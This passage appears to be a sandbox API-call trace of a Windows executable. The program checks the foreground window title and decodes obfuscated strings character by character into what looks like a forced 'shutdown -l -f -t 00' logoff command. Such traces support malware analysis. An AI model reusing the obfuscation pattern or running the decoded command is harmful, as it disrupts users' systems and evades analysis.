pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.099] GetForegroundWindow () returned 0x20086 [0179.099] GetLastError () returned 0x0 [0179.100] SysStringLen (param_1=" ") returned 0xff [0179.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0179.100] SysStringLen (param_1=" ") returned 0xff [0179.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0179.100] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0179.100] GetLastError () returned 0x0 [0179.100] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0179.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0179.101] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0179.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0179.101] SysStringLen (param_1="Program Manager") returned 0x10 [0179.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Program Manager", cchWideChar=17, lpMultiByteStr=0x114721c, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Program Manager", lpUsedDefaultChar=0x0) returned 17 [0179.101] SetWindowTextA (hWnd=0x103c4, lpString="Program Manager") returned 1 [0179.101] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0179.102] GetFocus () returned 0x0 [0179.102] lstrlenA (lpString="Program Manager") returned 15 [0179.102] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x114721c) returned 0x1 [0179.102] IsWindow (hWnd=0x103c4) returned 1 [0179.102] IsWindow (hWnd=0x103c4) returned 1 [0179.103] IsWindow (hWnd=0x103c4) returned 1 [0179.103] IsWindow (hWnd=0x103c4) returned 1 [0179.103] GetFocus () returned 0x0 [0179.103] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xf [0179.171] GetFocus () returned 0x0 [0179.171] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x10) returned 0x10e1d20 [0179.171] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x10, lParam=0x10e1d20) returned 0xf [0179.171] GetFocus () returned 0x0 [0179.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0179.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=-1, lpWideCharStr=0x114721c, cchWideChar=16 | out: lpWideCharStr="Program Manager") returned 16 [0179.171] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10e1d20 | out: hHeap=0x10d0000) returned 1 [0179.171] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0179.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.173] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0179.173] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.173] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0179.173] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.174] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0179.174] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.175] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0179.175] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.176] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0179.176] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.177] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0179.177] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.178] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0179.178] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.179] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0179.179] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.179] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.180] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.180] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0179.181] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.181] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0179.181] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.186] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0179.187] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.187] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0179.187] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.188] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.188] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.189] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.189] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.190] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0179.190] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.191] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.191] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.191] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.192] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.192] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0179.193] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.193] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.193] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.194] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.194] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.195] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.195] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.196] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.196] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.201] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0179.201] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.202] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0179.202] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.202] GetForegroundWindow () returned 0x20086 [0179.202] GetLastError () returned 0x0 [0179.203] SysStringLen (param_1=" ") returned 0xff [0179.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0179.203] SysStringLen (param_1=" ") returned 0xff [0179.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0179.203] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0179.203] GetLastError () returned 0x0 [0179.203] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0179.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0179.204] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0179.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0179.204] SysStringLen (param_1="Progr") returned 0x5 [0179.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Progr", cchWideChar=6, lpMultiByteStr=0x1150ca4, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Progr", lpUsedDefaultChar=0x0) returned 6 [0179.204] SetWindowTextA (hWnd=0x103c4, lpString="Progr") returned 1 [0179.204] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xf [0179.205] GetFocus () returned 0x0 [0179.205] lstrlenA (lpString="Progr") returned 5 [0179.205] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x1150ca4) returned 0x1 [0179.205] IsWindow (hWnd=0x103c4) returned 1 [0179.205] IsWindow (hWnd=0x103c4) returned 1 [0179.205] IsWindow (hWnd=0x103c4) returned 1 [0179.205] IsWindow (hWnd=0x103c4) returned 1 [0179.206] GetFocus () returned 0x0 [0179.206] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0179.206] GetFocus () returned 0x0 [0179.206] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x6) returned 0x10ebcd0 [0179.206] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x6, lParam=0x10ebcd0) returned 0x5 [0179.207] GetFocus () returned 0x0 [0179.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Progr", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0179.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Progr", cbMultiByte=-1, lpWideCharStr=0x1150ca4, cchWideChar=6 | out: lpWideCharStr="Progr") returned 6 [0179.207] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0179.207] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0179.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.208] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0179.208] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", 